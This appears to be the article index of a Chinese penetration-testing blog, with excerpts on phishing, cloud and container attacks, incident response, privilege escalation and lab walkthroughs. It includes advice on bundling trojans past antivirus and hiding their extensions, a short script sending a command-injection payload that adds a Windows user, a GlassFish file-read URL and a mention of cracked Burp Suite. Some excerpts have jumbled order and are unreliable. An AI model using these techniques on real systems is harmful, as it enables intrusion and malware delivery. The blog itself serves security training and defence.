mobile 安卓逆向解题思路

问题描述：app抓包存在证书校验，常规抓包拦截网卡无法获取到数据，而证书校验分为单项证书校验，和双向证书校验。在终端模拟器执行下面命令，这里注意模拟器的版本选择7.1，9.0的版本SDK不兼容。2.科来协议分析，可以获取模拟器进程的网络通讯信息，目标通讯的ip地址。3.封包监听工具，同科来一致，监听的进程即可获取到服务器腾通讯ip信息。1.模拟器开启本地以太网代理，设置端口，bp监听以太网系统端口即可。开启外部代理工具，取消本地代理，密码为空，代理类型选择https。2.模拟器内改变配置，尝试突破。

app抓包-突破【单向证书验证&代理检测&模拟器检测】

2.杀毒软件也可能会监测文件释放过程： 捆绑器的免杀：腾讯管家杀文件捆绑器，不杀winwar压缩包，换新捆绑器，可以免杀通过腾讯管家 所以捆绑免杀的两个关注点：白名单逻辑捆绑器和木马的免杀。通过测试发现，普通文件rar进行压缩释放，安全软件不会报毒，但是如果是一些其他个人开发的捆绑压缩工具，安全软件会报毒，所以一般选用白名单的工具（不会报毒的捆绑工具）需要注意的是压缩释放后的exe顺序，将木马放在后面，点击释放运行后即可上线，但是缺陷在于，系统会提权询问释放安装运行等字眼，木马文件后缀隐藏，图标修改技巧。

文件钓鱼-后缀隐藏&文件捆绑&文件压缩释放技巧

SPF即发送方策略框架，某种邮件服务器会有自己的SPF策略设定，可以设定SPF为只允许某些主机发送邮件等，当设定后第三方就无法伪造成邮件服务器的管理员对用户下发邮件。linux下：dig -t txt qq.comwindows下：nslookup -type=txt qq.com"v=spf1 -all" （拒绝所有，表示这个域名不会发出邮件）"v=spf1 +all" （接受所有）

邮件钓鱼-邮件来源伪造-SPF绕过-setoolkit&&gohish&&swaks钓鱼

Nuclei是一款基于YAML语法模板的开发的定制化快速漏洞扫描器。它使用Go语言开发，具有很强的可配置性、可扩展性和易用性。提供TCP、DNS、HTTP、FILE 等各类协议的扫描，通过强大且灵活的模板，可以使用Nuclei模拟各种安全检查。提取器/匹配器：提取，匹配返回包内容，匹配出需要的目标（根据目标结果特征用匹配还是提取）http：漏洞利用核心， {{xx}}：提取目标地址的匹配信息。info：漏洞描述情况（级别，编号，标签，简介等）不允许tab，只能空格。

漏洞扫描-nuclei-poc编写

拿到shell后需要判断是否是处于docker环境中，上面图片我用了很简单的一个方法，查看ls -al下的根目录，看是否存在dockerenv文件，如果存在，则大概率为docker环境，下面还有其他的一些方法，在实战可以多个结合参考。观察到获取到docker搭建的容器shell与真实主机是有区别的，也就是我们存在于docker环境的shell中，不管在内容如何去操作，都只是在容器环境中，这个时候就需要突破容器环境，搭建容器逃逸，控制对方真实主机。后者是将整个系统打包，封装一个系统。

云安全-云原生技术架构（Docker逃逸技术-特权与危险挂载）

创建相同的桶，上传html文件访问测试（通过oss设置的备案域名访问，oss域名无效危害证明）通过put或者自己上传文件后访问，发现上传成功，可以通过对方设置的域名直接访问，造成接管，云厂商所对应的云服务包括：对象存储，云数据库，弹性计算服务（云主机），云控制台。各厂商对象存储名词：阿里云OSS，腾讯云COS，华为云OBS，亚马逊云S3。上传后尝试通过对方设置的域名信息访问，如访问成功，则成功接管。云安全厂商分类：阿里云，腾讯云，华为云，亚马逊云等。与其创建相同的oss（厂商，地区，相同名称）

云安全-对象存储安全（配置错误，域名接管，AK泄露）

k8s（Kubernetes） 是容器管理平台，用来管理容器化的应用，提供快速的容器调度、弹性伸缩等诸多功能，可以理解为容器云，不涉及到业务层面的开发。只要你的应用可以实现容器化，就可以部署在k8s 上，通过k8s对应用负载进行调度，配合hpa (Horizontal PodAutoscaling) 可以实现应用负载的弹性伸缩从而解决高并发量的问题。简单说就是：管理多台主机上的容器应用，是一个集群管理（Master节点）以往的攻击点思路通常：外网信息收集打点，漏洞攻击，获取权限，提权内网横向…

云安全-云原生k8s攻击点（8080，6443，10250未授权攻击点）

当账户配备了ram账户，即给该账户赋予了对于云上服务器的一些管理权限，一是方便了用户管理，但另一方面当存在服务器失陷且存在RAM用户权限，可能对云上服务器资产造成很大的危害。也就是说，数据库的登录需要在设置的云服务器且是配置的内网段环境中登录，在对互联网上的云资产来说，无疑是非常安全的，但可以配置公网访问添加白名单。当获取了一台云服务器权限，首先定位其厂商，再通过元数据读取到一些相关信息，如果配备了RAM，即可尝试读取临时凭证，进行云上渗透。在集群配置选项中，需要给数据库配置路由交换，专有虚拟网络。

云安全-云服务器（RAM）后渗透

上面可以看到逃逸的种类的以及其中的方法很多，但是实际环境中，是时间紧任务重，一步步的尝试逃逸难免有些费事，这里列举两种工具，CDK和check，集成了自动逃逸方法检测，CDK还集成了对应的poc实现一键逃逸，满足下列的版本时候，可以尝试该docker漏洞逃逸提权，详细的实验过程这里不作赘述，相关的操作网上也有大量的文章，但是实际的环境去逃逸，还是就事论事，会有许多的其他情况发生。CDK的自动化逃逸中包含了挂载，特权等许多的自动化利用，上述的两种逃逸类型为docker的漏洞，分别是。

云安全-云原生基于容器漏洞的逃逸自动化手法(CDK check)

堡垒机是种网络安全设备，用于保护和管理企业内部网络与外部网络之间的访问。它作为一种中间节点，提供安全的访问控制和审计功能，用于保护内部网络免受未经授权的访问和攻击。堡垒机通常被用作跳板服务器，即堡垒机来管理和访问其他内部服务器。具有身份鉴别、帐号管理、权限控制、安全审计，身份访问控制等功能，堡垒机一般部署在内网，作为内网它所管控所有主机的安全审计系统平台，一般不会在外部网络暴露web界面。

云安全-攻防视角下如何看待堡垒机

1.窃取用户敏感信息，制作虚假网址，诱导用户输入敏感的账户信息后记录
2.携带病毒木马程序，诱导安装，使电脑中病毒木马等
3.挖矿病毒的传输，勒索病毒的传输等等

应急响应-钓鱼邮件的处理思路溯源及其反制

记一次应急响应实战分析-附加应急响应工具包

攻击者利用受害机器资源进行高强度的计算运行工作，导致受害机cpu gpu持续拉满，服务缓慢甚至宕机等。及可能存在挖矿问题，linux，windows均可存在相关问题，

应急响应-挖矿木马的清除思路

将该文件上传沙箱检测，确定为木马程序，且为内容存在条件竞争，且调用多种终端，行为非常正常文件，在Linux系统中查找并终止与指定关键词相关的进程。具体而言，它使用pgrep命令来查找与指定关键词匹配的进程ID，然后使用xargs和kill命令来终止这些进程。

应急响应-linux挖矿病毒的实战处置

windows主机cpu拉满，主机卡顿，初步判断为中了挖矿病毒通过分析JSON文件看起来像是一个配置文件，用于配置某个软件或程序的行为。其中包含了一些特殊的字段符号：cpu，opencl，pools等

应急响应-Windows挖矿实战

1.利用时间节点筛选日志行为
2.利用已知的漏洞在日志进行特征搜索，快速定位到目标ip等信息
3.后门查杀，获取后门信息，进一步定位目标信息

应急响应-web后门（中间件）的排查思路

针对主机后门windows，linux，在对方植入webshell后，需要立即响应，排查出后门位置，以及排查对外连接，端口使用情况等等
排查对外连接状态：
借助工具：pchunter 火绒剑 均可，不方便情况下cmd查看对外连接状态，进程状态，端口信息等

应急响应-主机后门webshell的排查思路（webshell，启动项，隐藏账户，映像劫持，rootkit后门）

勒索病毒入侵方式：服务弱口令，未授权，邮件钓鱼，程序木马植入，系统漏洞等
勒索病毒的危害：主机文件被加密，且几乎难以解密，对主机上的文件信息以及重要资产存在被贩卖等
勒索病毒现象：cpu占用率高，文件等应用均无法打开，打开乱码，大多数勒索windows将为常见

应急响应-勒索病毒的处理思路

文件操作之文件下载读取漏洞-CVE-2019-18371

def baiud_get():
    while not q.empty():
        bd=q.get()
        req=requests.get(bd,headers=headers)
        time.sleep(4)
        baidu=req.text
        html=etree.HTML(baidu)
        ul=html.xpath('//h3[@class="c-title t t tts-title"]')
        for  uls in ul:
            t=uls.xpath('./a[1]')
            for tt in t:
                ttt=tt.xpath('@href')
                r=requests.get(ttt[0])
                print(r.url)

python安全开发-子域名爬取&ftp爆破

在sqlmap目录下面还存在一个sqlmapapi.py的程序，sqlmap.py本身具有批量扫描的能力，常见批量扫描有使用-l参数扫描bur代理的日志目标或者-m扫描多个对象时候，推荐使用sqlmap的api接口，效率更高，sqlmapapi接口有两种使用方式，本地直接使用或者是当与本地不在一起时候，使用客户端与服务端连接使用，这两种使用方法就不做介绍了，今天介绍使用pytohn开发配合sqlmapapi接口批量扫描。

python开发-sqlmapapi接口批量扫描注入

def scan():
    while not q.empty():
        dir=q.get()
        urls=url+dir
        urls=urls.replace("\n",'')
        code=requests.get(urls).status_code
        if code==200 or code==403:
            f=open("yes.txt","a+")
            f.write(urls)
            f.close
        else:
            print(urls+'|'+str(code))
            time.sleep(1)

python安全开发-多线程目录扫描&端口扫描&子域名爆破

import requests
url_add="/?search==%00{.exec|cmd%20/c%20net%20user%20bbbbb%20123%20/add.}"
url="http://192.168.213.163/"

urls=url+url_add
print(urls)

def add():
    code=requests.get(urls).status_code
    if code ==200:
        print("yes+urls")
    else:
        print("no+urls")

if __name__ == '__main__':
    add()

python安全开发-rce命令执行&请求测试&豆 ban的信息爬取

漏洞分析：
glassfish是一款java编写的跨平台的开源的应用服务器。
与宽字节SQL注入一致，都是由于unicode编码歧义导致的。具体payload如下构造：
https://your-ip:4848/theme/META-INF

Python开发-fofa批量挖掘glassfish-任意读取漏洞

平常的盲注如果手工会很麻烦，多数情况都会借助sqlmap等相关软件跑，但是有些情况下，考虑到sqlmap的线程以及其他情况，会造成其他的影响，这里我们来简单使用python构造一个盲注脚本，低线程，高效率。

构造EXP-Python盲注脚本

Python基础入门Top50

Linux提权总结

Mysql-MOF提权

权限提升-mssql-oracle提权随笔

权限提升-mysql提权

Mysql-UDF提权

权限提升-Linux提权-suid-脏牛内核

权限提升-windows提权补丁-溢出-AT-SC-PS提权

WAF绕过-漏洞发现-漏扫绕过

WAF绕过-目录扫描-python-exp

WAF绕过-注入上传RCE利用绕过思路

WAF绕过-木马混淆免杀姿势

逻辑越权-水平垂直越权漏洞

逻辑越权-登录脆弱-支付篡改-找回类型漏洞

漏洞发现-操作系统-中间件-服务API接口小结

BurpSuite联动Xray&&Sqlmap&&抓取APP数据包

APP渗透测试和Web渗透测试基本没有区别。APP(应用程序，Application)，一般指手机软件。一个网站存在SQL注入，用PC端浏览器去访问存在SQL注入漏洞，用手机浏览器去访问一样也存在SQL注入漏洞，APP大部分漏洞的存在并不是在客户端而是在服务端。

app测试-提取-测试框架-反证书抓包

使用proxifier突破模拟器的本地代理限制，使用xp框架突破证书限制，实现联动bp抓取http协议数据包，突破虚拟的检测的简述

app测试-Proxifier突破代理&&xp框架突破证书-突破虚拟检测

app测试-小结随笔

JAVA反序列化漏洞简述

关于DOM型XSS的深入解析

最实用的正则表达式

浅谈SSRF-服务器请求伪造-Weblogice框架漏洞

对于端口的探针是一个重点关注的地方，不同的端口会有代表的不同的协议传输的服务，而对于这些一些常见的服务端口，我们需要对其进行的渗透测试做一个简要的汇总

渗透测试-应用协议安全

渗透测试-信息打点（红队工具篇）

渗透测试-信息收集打点（基础篇）

JAVA安全-JWT令牌

BurpSuite超详细使用教程

渗透DC-9-sql注入

渗透DC-8-文件共享

渗透DC-7-木马注入

渗透DC-6-命令注入

渗透DC-5-文件包含

渗透DC-4-暴力破解

渗透DC-3-内核提权-文件共享

渗透DC-2-suid提权

渗透DC-1-附suid提权笔记

内网渗透-最实用的信息收集

内网渗透-必须掌握的代理与隧道技术解答

内网渗透-最实用的横向移动总结

Strike-域渗透

CS安装教程

Windows系统备份

操作系统中间件安全加固手册

Mysql安全加固手册

IIS安全加固手册

Windows安全加固手册

中间件漏洞总结-Nginx-Tomcat

中间件漏洞总结-Apache-IIS-Nginx-Tomcat

漏洞挖掘技巧-开源程序漏洞挖掘

文件操作之文件包含解析

DNS是起ip与域名的解析的服务，通过ip可以解析到对应的域名。DNSlog就是储存在DNS上的域名相关的信息，它记录着你对域名或者IP的访问信息，也就是类似于日志文件，

DNSlog简介

PHP反序列化入门到上手-网鼎杯-AreUSerialz

cisp-pte真题解答

使用各种的shell工具获取到目标权限，即可进行数据操作，今天来简要分析一下目前常使用的各类shell管理工具的流量特诊，帮助蓝队同学在风险识别上快速初值

Webshell工具的流量特征分析（菜刀，蚁剑，冰蝎，哥斯拉）

2、web防护
（1）打包网站目录/var/www/html ：tar -cvf xxx.tar 打包对象/*
（2）ssh ftp 将文件拉到本地
①ssh ：scp root@192.168.16.8:/root/flag.txt /root/
②ftp：#ftp [IP地址] #get [文件名] 或者用ftp登入软件下载
（3）d盾查杀木马文件，删除文件
①：rm -rf 文件

AWD比赛中的一些防护思路

1.php弱类型的比较
2.php断言问题
3.php读取文件
4.preg_match绕过
5.sha1()函数与md5()
6.异或注入绕过
7.updatexml（）函数考点
8.命令执行绕过：https://www.cnblogs.com/iloveacm/p/13687654.html
9.源文件泄露
10.extract变量覆盖
11.strcmp漏洞

CTF-PHP常见考点

文件包含伪协议小结备忘录

通常在网站的通讯中，很多会调用api接口去方便更多信息的管理与调用，但是当使用某些api时，在开发人员未对api接口做出访问策略限制或其他的加固，会导致其他的用户发现api的时候可能会从中获取到敏感信息泄露，或者其他的sql注入等等安全问题，本文介绍三种api的利用与发现

api接口安全测试-Wsdl&Swagger&Webpack

网络安全-安全服务工程师-技能手册详细总结

浅谈文件上传漏洞

最实用的应急响应笔记思路小结

应急响应笔记思路小结

SSRF漏洞的多种绕过方式与防御手段

SSTI模板注入(Server-Side Template Injection)，通过与服务端模板的 输入输出交互，在过滤不严格的情况下，构造恶意输入数据，从而达到读取文件或者getshell的目的，目前CTF常见的SSTI题中，大部分是考python的。

SSTI模板注入讲解与真题实操

Redis 未授权访问漏洞与getshell（附getshell检测工具）

Log4j远程代码执行漏洞分析

权限提升-windows令牌窃取烂土豆-引号路径提权

实用的CDN绕过-CMS识别-WAF识别技术总结

fastjson是常用于解析java中的数据，将对象解析为json格式，被广泛应用于各大java项目中，首先爆出1.2.24反序列化rce，后增加了反序列化白名单的机制，不久在1.2.47版本中又被发现反序列化rce，可通过构造恶意的json反序列化rce

Fastjson v 1.2.47反序列化漏洞

获取攻击IP
IP反查定位（考虑是否为代理）
IP资产探测（masscan+nmap）、在线端口探测等
IP web的指纹识别等信息收集

记一次hw真实溯源笔记思路

教育行业edu漏洞挖掘思路小结

Burp Suite Pro v2020.12.1破解安装专业版

Struts2 基于 MVC 架构，框架结构清晰。通常作为控制器（Controller）来建立模型与视图的数据交互，用于创建企业级 Java web 应用程序。该框架多版本存在远程代码执行，

0x00 环境介绍

0x01 信息收集

0x02 渗透测试

0x03 权限提升

0x04 个人知识点总结